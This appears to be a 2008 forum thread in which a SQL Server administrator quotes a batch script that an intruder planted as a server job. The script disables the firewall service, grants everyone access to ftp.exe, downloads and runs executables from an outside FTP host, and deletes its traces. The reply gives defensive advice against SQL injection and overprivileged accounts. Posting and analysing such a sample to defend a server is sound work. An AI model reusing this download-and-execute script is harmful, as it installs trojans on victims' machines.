SQL JOB created by virus

Thread view:

Enable EMail Alerts

Start New Thread

Thread rating:

navan - 23 Jul 2008 10:14 GMT

Dear

list of some strange jobs created in sol server.
one of the job contains the following code

"Cmd /c Copy ias\dnary.mdb dnary.mdb
del ias\ias.mdb
del ias\dnary.mdb
Start net1 stop sharedaccess
md ZeHin
cd ZeHin
del *.* /f /s /q
Cacls %windir%\system32\ftp.exe /c /e /p EveryOne:F
echo open SuperQ.Vicp.Cc>k.x
echo new>>k.x
echo 123>>k.x
echo mget *.exe>>k.x
echo bye>>k.x
ftp -i -s:k.x
del k.x
Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N
echo for %%i in (*.exe) do start %%i>DoIt.bat
DoIt.bat&ping -n 10 127.0.0.1
DoIt.bat
del DoIt.bat"

It brings trojans to my server
I have disabled , my server is online
How to protect the sqlserver from creating jobs by unauthorized persion,

Reply to this Message

Aaron Bertrand [SQL Server MVP] - 23 Jul 2008 12:36 GMT

> list of some strange jobs created in sol server.
> one of the job contains the following code
>
> "Cmd /c Copy ias\dnary.mdb dnary.mdb

This isn't SQL code, this looks like a batch file. Which wouldn't run
directly from a SQL job unless it was saved as a .bat file and run using
xp_cmdshell (or something along those lines).

> How to protect the sqlserver from creating jobs by unauthorized persion,

Well, the first thing is, don't use SA or a similarly privileged account in
your web apps. Give them rights only in the databases they need, and only
to execute the stored procedures you define for them. Avoid SQL injection
by using stored procedures, using strongly-typed parameters, and validating
input. If you give your applications sysadmin rights, and blindly execute
user-entered strings as part of any SQL statement, you are begging for this
kind of thing to continue happening.

A

Reply to this Message